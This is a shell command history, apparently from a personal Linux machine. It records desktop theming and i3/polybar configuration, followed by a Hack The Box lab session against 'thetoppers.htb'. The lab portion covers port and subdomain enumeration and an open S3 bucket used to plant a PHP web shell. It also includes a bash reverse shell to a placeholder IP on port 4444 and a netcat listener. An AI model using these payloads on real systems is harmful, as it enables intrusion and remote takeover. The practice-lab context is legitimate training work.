htb_commands_dec24.txt¶
File:
htb/htb_commands_history/htb_commands_dec24.txt
1 sudo apt update
2 su -
3 sudo apt update
4 sudo update-alternatives --config editor
5 visudo
6 su -
7 vim ~/.inputrc
8 sudo apt install vim
9 sudo apt-get update && sudo apt-get install vim
10 sudo apt install vim-common
11 vim
12 which vim
13 vi .bashrc
14 source .bashrc
15 vim
16 su -
17 sudo apt install ulauncher
18 sudo apt install synapse
19 vim .bashrc
20 synpase
21 synapse
22 curl -fsSL https://claude.ai/install.sh | bash
23 sudo apt install curl
24 curl -fsSL https://claude.ai/install.sh | bash
25 echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc && source ~/.bashrc
26 apt install dracula-gtk-theme
27 sudo apt install dracula-gtk-theme
28 cd ~/Downloads
29 wget https://github.com/dracula/gtk/archive/master.zip
30 unzip master.zip
31 mkdir -p ~/.themes
32 cp -r gtk-master ~/.themes/Dracula
33 git clone https://github.com/dracula/gtk.git ~/Downloads/dracula-icons
34 sudo cp -r ~/Downloads/dracula-icons/kde/cursors/Dracula-cursors /usr/share/icons/sudo apt install git
35 sudo apt install git
36 git clone https://github.com/dracula/gtk.git ~/Downloads/dracula-icons
37 sudo cp -r ~/Downloads/dracula-icons/kde/cursors/Dracula-cursors /usr/share/icons/
38 c
39 clear
40 vim ~/.themes/Dracula/index.theme
41 source ~/.themes/Dracula/index.theme
42 clear
43 sudo apt install i3-gaps polybar rofi picom nitrogen lxappearance
44 sudo apt install i3 i3-gaps polybar rofi picom nitrogen lxappearance
45 sudo apt install i3 polybar rofi picom nitrogen lxappearance
46 cd ~/.config/
47 ls
48 mkdir i3
49 vim i3/config
50 mkdir polybar
51 vim polybar/launch.sh
52 chmod +x ~/.config/polybar/launch.sh
53 vim polybar/config
54 clear
55 mkdir picom
56 vim picom/picom.conf
57 nitrogen
58 cat > ~/i3-keybinds.md << 'EOF'
59 # i3 Keybindings Reference
60 **Mod key = Command (⌘) on MacBook**
61 ## Core Commands
62 - `Mod+Enter` - open terminal
63 - `Mod+d` - app launcher (dmenu/rofi)
64 - `Mod+Shift+q` - kill focused window
65 - `Mod+Shift+e` - exit i3
66 - `Mod+Shift+r` - restart i3 (reload config)
67 - `Mod+Shift+c` - reload config without restart
68 ## Window Navigation
69 - `Mod+h/j/k/l` - move focus left/down/up/right (vim style)
70 - `Mod+arrow keys` - also works for focus
71 - `Mod+Shift+h/j/k/l` - move window left/down/up/right
72 - `Mod+Shift+arrows` - also moves windows
73 ## Workspaces
74 - `Mod+1` through `Mod+9` - switch to workspace 1-9
75 - `Mod+Shift+1` through `Mod+9` - move window to workspace
76 ## Layout
77 - `Mod+e` - toggle split horizontal/vertical
78 - `Mod+s` - stacking layout
79 - `Mod+w` - tabbed layout
80 - `Mod+f` - fullscreen toggle
81 - `Mod+Shift+space` - toggle floating
82 ## Splitting
83 - `Mod+h` - split horizontal
84 - `Mod+v` - split vertical
85 ## Resizing
86 - `Mod+r` - enter resize mode
87 - Then `h/j/k/l` or arrows to resize
88 - `Esc` or `Enter` - exit resize mode
89 ## Quick Start
90 1. `Mod+Enter` - open terminal
91 2. `Mod+1`, `Mod+2` - switch workspaces
92 3. `Mod+d` - launch apps
93 4. `Mod+Shift+q` - close windows
94 EOF
95 cd
96 ls
97 vim i3-keybinds.md
98 ls
99 cat i3-keybinds.md
100 cd .config/
101 vim i3/config
102 vim polybar/config.ini
103 rm polybar/config
104 ls polybar/
105 vim polybar/launch.sh
106 chmod +x ~/.config/polybar/launch.sh
107 vim picom/picom.conf
108 sudo apt install rofi
109 mkdir rofi
110 vim rofi/config.rasi
111 ls
112 cat i3-keybinds.md
113 ls
114 vim .config/i3/config
115 cd .config/
116 vim polybar/config.ini
117 vim i3/config
118 cat i3-keybinds.md
119 mate-screenshot
120 cd .config/
121 ls
122 rmdir i3/ polybar/ picom/ rofi/
123 rmdir -f i3/ polybar/ picom/ rofi/
124 rmdir -rf i3/ polybar/ picom/ rofi/
125 rm -rf i3/ polybar/ picom/ rofi/
126 c
127 clear
128 cd ~
129 mkdir -p i3-setup/{i3,polybar,picom,rofi}
130 cd i3-setup
131 ls
132 cat > i3/config << 'EOF'
133 # i3 config file
134 set $mod Mod4
135 font pango:Hack 12
136 set $bg #1a1b26
137 set $fg #c0caf5
138 set $pink #ff79c6
139 set $cyan #8be9fd
140 set $dark #24283b
141 client.focused $pink $pink $bg $cyan
142 client.focused_inactive $dark $dark $fg $dark
143 client.unfocused $bg $bg $fg $bg
144 client.urgent $pink $pink $bg $pink
145 gaps inner 15
146 gaps outer 10
147 for_window [class=".*"] border pixel 2
148 exec_always --no-startup-id ~/.config/polybar/launch.sh
149 exec_always --no-startup-id picom
150 exec --no-startup-id nitrogen --restore
151 bindsym $mod+Return exec mate-terminal
152 bindsym $mod+d exec rofi -show drun
153 bindsym $mod+Shift+3 exec mate-screenshot
154 bindsym $mod+Shift+4 exec mate-screenshot -a
155 bindsym $mod+Shift+q kill
156 bindsym $mod+Shift+c reload
157 bindsym $mod+Shift+r restart
158 bindsym $mod+Shift+e exec "i3-msg exit"
159 bindsym $mod+h focus left
160 bindsym $mod+j focus down
161 bindsym $mod+k focus up
162 bindsym $mod+l focus right
163 bindsym $mod+Left focus left
164 bindsym $mod+Down focus down
165 bindsym $mod+Up focus up
166 bindsym $mod+Right focus right
167 bindsym $mod+Shift+h move left
168 bindsym $mod+Shift+j move down
169 bindsym $mod+Shift+k move up
170 bindsym $mod+Shift+l move right
171 bindsym $mod+Shift+Left move left
172 bindsym $mod+Shift+Down move down
173 bindsym $mod+Shift+Up move up
174 bindsym $mod+Shift+Right move right
175 bindsym $mod+b split h
176 bindsym $mod+v split v
177 bindsym $mod+f fullscreen toggle
178 bindsym $mod+s layout stacking
179 bindsym $mod+w layout tabbed
180 bindsym $mod+e layout toggle split
181 bindsym $mod+Shift+space floating toggle
182 bindsym $mod+space focus mode_toggle
183 bindsym $mod+1 workspace number 1
184 bindsym $mod+2 workspace number 2
185 bindsym $mod+3 workspace number 3
186 bindsym $mod+4 workspace number 4
187 bindsym $mod+5 workspace number 5
188 bindsym $mod+6 workspace number 6
189 bindsym $mod+7 workspace number 7
190 bindsym $mod+8 workspace number 8
191 bindsym $mod+9 workspace number 9
192 bindsym $mod+Shift+1 move container to workspace number 1
193 bindsym $mod+Shift+2 move container to workspace number 2
194 bindsym $mod+Shift+3 move container to workspace number 3
195 bindsym $mod+Shift+4 move container to workspace number 4
196 bindsym $mod+Shift+5 move container to workspace number 5
197 bindsym $mod+Shift+6 move container to workspace number 6
198 bindsym $mod+Shift+7 move container to workspace number 7
199 bindsym $mod+Shift+8 move container to workspace number 8
200 bindsym $mod+Shift+9 move container to workspace number 9
201 mode "resize" {
202 bindsym h resize shrink width 10 px or 10 ppt
203 bindsym j resize grow height 10 px or 10 ppt
204 bindsym k resize shrink height 10 px or 10 ppt
205 bindsym l resize grow width 10 px or 10 ppt
206 bindsym Left resize shrink width 10 px or 10 ppt
207 bindsym Down resize grow height 10 px or 10 ppt
208 bindsym Up resize shrink height 10 px or 10 ppt
209 bindsym Right resize grow width 10 px or 10 ppt
210 bindsym Return mode "default"
211 bindsym Escape mode "default"
212 }
213 bindsym $mod+r mode "resize"
214 EOF
215 cat > polybar/config.ini << 'EOF'
216 [colors]
217 bg = #1a1b26
218 fg = #c0caf5
219 pink = #ff79c6
220 cyan = #8be9fd
221 dark = #24283b
222 [bar/main]
223 width = 100%
224 height = 35
225 background = ${colors.bg}
226 foreground = ${colors.fg}
227 padding = 2
228 module-margin = 2
229 font-0 = Hack:size=11;3
230 modules-right = cpu memory battery wlan time
231 tray-position = right
232 tray-padding = 2
233 [module/cpu]
234 type = internal/cpu
235 interval = 2
236 label = CPU %percentage%%
237 format-foreground = ${colors.cyan}
238 [module/memory]
239 type = internal/memory
240 interval = 2
241 label = RAM %percentage_used%%
242 format-foreground = ${colors.pink}
243 [module/battery]
244 type = internal/battery
245 battery = BAT0
246 adapter = AC
247 full-at = 98
248 label-charging = CHG %percentage%%
249 label-discharging = BAT %percentage%%
250 label-full = FULL
251 format-charging-foreground = ${colors.cyan}
252 format-discharging-foreground = ${colors.pink}
253 [module/wlan]
254 type = internal/network
255 interface = wlan0
256 interval = 3
257 label-connected = %essid%
258 format-connected-foreground = ${colors.cyan}
259 [module/time]
260 type = internal/date
261 interval = 1
262 date = %I:%M %p
263 label = %date%
264 format-foreground = ${colors.pink}
265 EOF
266 cat > polybar/launch.sh << 'EOF'
267 #!/bin/bash
268 killall -q polybar
269 while pgrep -u $UID -x polybar >/dev/null; do sleep 1; done
270 polybar main 2>&1 | tee -a /tmp/polybar.log & disown
271 EOF
272 chmod +x polybar/launch.sh
273 cat > picom/picom.conf << 'EOF'
274 backend = "glx";
275 vsync = true;
276 inactive-opacity = 0.9;
277 active-opacity = 1.0;
278 shadow = true;
279 shadow-radius = 12;
280 shadow-opacity = 0.75;
281 shadow-offset-x = -12;
282 shadow-offset-y = -12;
283 fading = true;
284 fade-in-step = 0.03;
285 fade-out-step = 0.03;
286 EOF
287 cat > rofi/config.rasi << 'EOF'
288 configuration {
289 modi: "drun";
290 font: "Hack 14";
291 show-icons: true;
292 }
293 * {
294 bg: #1a1b26;
295 fg: #c0caf5;
296 pink: #ff79c6;
297 cyan: #8be9fd;
298 background-color: @bg;
299 text-color: @fg;
300 }
301 window {
302 width: 600px;
303 padding: 20px;
304 border: 3px;
305 border-color: @pink;
306 }
307 element selected {
308 background-color: @pink;
309 text-color: @bg;
310 }
311 EOF
312 cat > install.sh << 'EOF'
313 #!/bin/bash
314 cp -r i3 ~/.config/
315 cp -r polybar ~/.config/
316 cp -r picom ~/.config/
317 cp -r rofi ~/.config/
318 chmod +x ~/.config/polybar/launch.sh
319 echo "Done. Log out and select i3 at login."
320 EOF
321 chmod +x install.sh
322 ./install.sh
323 cd
324 cat i3-
325 cat i3-keybinds.md
326 mate-screenshot
327 cat > ~/.config/i3/config << 'EOF'
328 # i3 config file
329 set $mod Mod4
330 font pango:Hack 12
331 set $bg #1a1b26
332 set $fg #c0caf5
333 set $pink #ff79c6
334 set $cyan #8be9fd
335 set $dark #24283b
336 client.focused $pink $pink $bg $cyan
337 client.focused_inactive $dark $dark $fg $dark
338 client.unfocused $bg $bg $fg $bg
339 client.urgent $pink $pink $bg $pink
340 gaps inner 15
341 gaps outer 10
342 for_window [class=".*"] border pixel 2
343 exec_always --no-startup-id ~/.config/polybar/launch.sh
344 exec_always --no-startup-id picom
345 exec --no-startup-id nitrogen --restore
346 bindsym $mod+Return exec mate-terminal
347 bindsym $mod+d exec rofi -show drun
348 bindsym $mod+Shift+s exec mate-screenshot
349 bindsym $mod+Shift+a exec mate-screenshot -a
350 bindsym $mod+Shift+q kill
351 bindsym $mod+Shift+c reload
352 bindsym $mod+Shift+r restart
353 bindsym $mod+Shift+e exec "i3-msg exit"
354 bindsym $mod+h focus left
355 bindsym $mod+j focus down
356 bindsym $mod+k focus up
357 bindsym $mod+l focus right
358 bindsym $mod+Shift+h move left
359 bindsym $mod+Shift+j move down
360 bindsym $mod+Shift+k move up
361 bindsym $mod+Shift+l move right
362 bindsym $mod+b split h
363 bindsym $mod+v split v
364 bindsym $mod+f fullscreen toggle
365 bindsym $mod+s layout stacking
366 bindsym $mod+w layout tabbed
367 bindsym $mod+e layout toggle split
368 bindsym $mod+Shift+space floating toggle
369 bindsym $mod+space focus mode_toggle
370 bindsym $mod+1 workspace number 1
371 bindsym $mod+2 workspace number 2
372 bindsym $mod+3 workspace number 3
373 bindsym $mod+4 workspace number 4
374 bindsym $mod+5 workspace number 5
375 bindsym $mod+6 workspace number 6
376 bindsym $mod+7 workspace number 7
377 bindsym $mod+8 workspace number 8
378 bindsym $mod+9 workspace number 9
379 bindsym $mod+Shift+1 move container to workspace number 1
380 bindsym $mod+Shift+2 move container to workspace number 2
381 bindsym $mod+Shift+3 move container to workspace number 3
382 bindsym $mod+Shift+4 move container to workspace number 4
383 bindsym $mod+Shift+5 move container to workspace number 5
384 bindsym $mod+Shift+6 move container to workspace number 6
385 bindsym $mod+Shift+7 move container to workspace number 7
386 bindsym $mod+Shift+8 move container to workspace number 8
387 bindsym $mod+Shift+9 move container to workspace number 9
388 mode "resize" {
389 bindsym h resize shrink width 10 px or 10 ppt
390 bindsym j resize grow height 10 px or 10 ppt
391 bindsym k resize shrink height 10 px or 10 ppt
392 bindsym l resize grow width 10 px or 10 ppt
393 bindsym Return mode "default"
394 bindsym Escape mode "default"
395 }
396 bindsym $mod+r mode "resize"
397 EOF
398 i3-msg-reload
399 cat i3-keybinds.md
400 cd .config/
401 vim i3/config
402 vim polybar/config.ini
403 vim picom/picom.conf
404 ls
405 cat i3-keybinds.md
406 nmap -sV -sT 10.129.227.248
407 sudo vim /etc/hosta
408 sudo vim /etc/hosts
409 nmap -sV -sT 10.129.227.248
410 sudo vim /etc/hosts
411 ping s3.thetoppers.htb
412 nmap -sV -sT 10.129.227.248
413 curl s3.thetoppers.htb
414 sudo apt install ghostbuster
415 sudo apt install gobuster
416 gobuster
417 gobuster s3 -u s3.thetoppers.htb -w /usr/share/wordlists/dirb/common.txt
418 gobuster s3 -w /usr/share/wordlists/dirb/common.txt -s s3.thetoppers.htb
419 gobuster dir -u http://s3.thetoppers.htb -w /usr/share/wordlists/dirb/common.txt
420 gobuster dir -u http://s3.thetoppers.htb -w /usr/share/wordlists/
421 gobuster -s3 h
422 gobuster s3 -h
423 gobuster s3 -h | xclip
424 gobuster dir -u http://s3.thetoppers.htb -w /usr/share/wordlists/dirb/common.txt
425 sudo apt install wordlists
426 sudo apt install seclists
427 gobuster dir -u http://s3.thetoppers.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
428 clear
429 sudo apt update
430 sudp apt install seclists
431 sudo apt install seclists
432 clear
433 sudo vim /etc/apt/sources.list
434 cd ~
435 git clone https://github.com/danielmiessler/SecLists.git
436 gobuster dir -u http://s3.thetoppers.htb -w ~/SecLists/Discovery/Web-Content/common.txt
437 gobuster s3 -w ~/SecLists/Discovery/Web-Content/common.txt --endpoint http://s3.thetoppers.htb
438 sudo apt install awscli
439 clear
440 aws configure
441 aws s3 ls --endpoint-url http://s3.thetoppers.htb
442 aws s3 sync s3://thetoppers.htb . --endpoint-url http://s3.thetoppers.htb
443 ls
444 cat index.php
445 cat index.php | grep email
446 aws s3 ls --endpoint-url http://s3.thetoppers.htb
447 gobuster s3 -w ~/SecLists/Discovery/Web-Content/common.txt --endpoint http://thetoppers.htb
448 gobuster dir -u http://thetoppers.htb -w ~/SecLists/Discovery/Web-Content/common.txt
449 gobuster dir -u http://s3.thetoppers.htb -w ~/SecLists/Discovery/Web-Content/common.txt
450 ls
451 vim index.php
452 ls images/
453 aws s3 ls --endpoint-url http://s3.thetoppers.htb
454 clear
455 gobuster dns -d thetoppers.htb -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
456 sudo vim /etc/hosts
457 gobuster dns -d thetoppers.htb -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
458 clear
459 sudo install ffuf
460 sudo apt install ffuf
461 ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.thetoppers.htb
462 cler
463 clear
464 sudo apt install wfuzz
465 wfuzz -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.thetoppers.htb" http://10.129.227.248
466 while read sub; do dig $sub.thetoppers.htb +short; done < wordlist.txt
467 ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.thetoppers.htb
468 clear
469 curl -s http://thetoppers.htb | wc -c
470 ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.thetoppers.htb
471 ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -mc all
472 ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -mc all -fs DEFAULT_SIZE
473 curl -s http://thetoppers.htb | wc -c
474 ffuf -w ~/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb -H "Host: FUZZ.thetoppers.htb" -mc all -fs 11952
475 nmap -sV -sT -p- s3.thetoppers.htb
476 cat index.php | grep flag
477 vim index.php
478 ls
479 vim index.php
480 aws s3 ls --endpoint-url http://s3.thetoppers.htb
481 aws s3 sync s3://thetoppers.htb . --endpoint-url http://s3.thetoppers.htb
482 aws s3 ls --endpoint-url http://s3.thetoppers.htb
483 aws s3 ls s3://thetoppers.htb --endpoint-url http://s3.thetoppers.htb --recursive
484 cat .htaccess
485 cd images/
486 ls
487 firefox
488 open band2.jpg
489 open band3.jpg
490 open final.jpg
491 cd ..
492 cat index.php | grep flag
493 aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive --include ".*"
494 aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive
495 find . -name "*flag*"
496 aws s3 cp test.txt s3://thetoppers.htb/test.txt --endpoint-url http://s3.thetoppers.htb
497 touch test.txt
498 aws s3 cp test.txt s3://thetoppers.htb/test.txt --endpoint-url http://s3.thetoppers.htb
499 echo "<?php system(\$_GET['cmd']); ?>" > shell.php
500 aws s3 cp shell.php s3://thetoppers.htb/shell.php --endpoint-url http://s3.thetoppers.htb
501 curl http://thetoppers.htb/shell.php?cmd=ls
502 curl http://thetoppers.htb/shell.php?cmd=cat%20flag.txt
503 aws s3api get-bucket-acl --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
504 curl http://thetoppers.htb/shell.php?cmd=ls%20-a
505 curl http://thetoppers.htb/shell.php?cmd=ll
506 curl http://thetoppers.htb/shell.php?cmd=cat%20flag.txt
507 curl http://thetoppers.htb/shell.php?cmd=ls
508 aws s3api list-object-versions --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
509 curl http://thetoppers.htb/action_page.php
510 nmap -sV -sT -p- s3.thetoppers.htb
511 ssh root@10.129.227.248
512 clear
513 curl http://s3.thetoppers.htb/thetoppers.htb/index.php
514 aws s3api get-bucket-tagging --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
515 aws s3api list-objects --bucket thetoppers.htb --endpoint-url http://s3.thetoppers.htb
516 clear
517 find . -name "*.pem" -o -name "*key*" -o -name "id_rsa*"
518 aws s3 ls s3://thetoppers.htb/ --endpoint-url http://s3.thetoppers.htb --recursive | grep -i "key\|ssh\|pem"
519 ip addr show tun0 | grep inet
520 cat > shell.php << 'EOF'
<?php
system("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
?>
EOF
521 vim shell.php
522 nc -lvnp 4444
523 mkdir htb_commands_history
524 history > ~/htb_commands_hisotry/htb_commands_dec24.txt
525 history > ~/htb_commands_history/htb_commands_dec24.txt